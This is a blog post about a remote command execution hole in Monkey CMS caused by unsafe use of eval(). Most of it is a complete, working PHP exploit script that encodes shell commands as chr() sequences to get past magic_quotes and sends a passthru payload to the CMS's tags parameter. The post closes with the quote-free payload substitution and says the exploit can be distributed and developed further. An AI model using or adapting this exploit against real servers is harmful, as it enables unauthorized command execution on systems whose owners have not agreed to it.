Few months ago when I was searching for a piece of code inside of a CMS, I accidentally saw a portal named “Monkey CMS”. It seemed a good but unpopular CMS. Hence, I decided to glance at its source, and some after I realized that it is worse than I’d ever thought. It had a dozen of common vulnerabilities reported recently. This update is based on remote command execution on Monkey CMS which resulted from inappropriate and insecure usage of eval() function. By default behavior, RCE hole can be mostly exploited as easy as drinking water (not always, see this). However, when remote server is enabled magic_quotes (of-course in < 5.4.0) the attacker might have trouble exploiting the vulnerability. I’ve exactly been faced this situation where I wasn’t enable to issue my command on remote server. hence, I wrote a simple exploit so as to bypass the magic_quotes term (I hardly name it evasion, whereas it is a simple trick at least):
<?php
/** To prevent of time out **/
set_time_limit(0);
/** Error reporting **/
error_reporting(0);
/** Necessary variables **/
$command = $argv[1];
$GoodCommand = NULL;
/** Turning words into ASCII equivalent **/
for($i=0;$i<strlen($command);$i++)
{
$GoodCommand .= 'chr('.ord(substr($command,$i,1)).').';
}
/** We don't need last dot (.) **/
$GoodCommand = substr($GoodCommand,0,-1);
/** $site can be assigned to $argv[2] **/
$site = 'http://www.monkeycms.com/index.php?page=TagIndex&tags=';
$payload = '${$command='.$GoodCommand.'}${@passthru($command)}';
/** Initializing **/
echo ' ______
.-" "-.
/ \
| |
|, .-. .-. ,|
| )(__/ \__)( |
|/ /\ \|
(@_ (_ ^^ _)
_ ) \_______\__|IIIIII|__/__________________________
(_)@8@8{}<________|-\IIIIII/-|___________________________>
)_/ \ /
(@ `--------`',"\n\n";
echo '/--------------------------------------------------------------\\',"\n";
echo '| Exploit by Yashar shahinzadeh & Mormoroth ',"\n";
echo '| Credit goes for http://ha.cker.ir & http://y-shahinzadeh.ir ',"\n";
echo '\--------------------------------------------------------------/',"\n\n";
/** Some information to user **/
echo '['.date("H:i:s").'] Generating payload... done!',"\n";
echo '['.date("H:i:s").'] Payload: '.$payload,"\n";
echo '['.date("H:i:s").'] Output: ',"\n\n";
/** Pure output of issued command **/
echo trim(preg_replace("/(<!DOCTYPE).*?(<\\/html>)/is",'',file_get_contents($site.$payload))),"\n";
exit();
/** Yasshar shahinzadeh **/
It must be noted that exploit above can easily be distributed and developed for further usages. The following snapshots illustrate how it works:
The main idea of exploit is not to use quote (‘). The substitution mentioned bottom is clearly useful:
${@passthru('id')} => $command=chr(105).chr(100)}${@passthru($command)}
Finally, I hope you find my tutorial practical.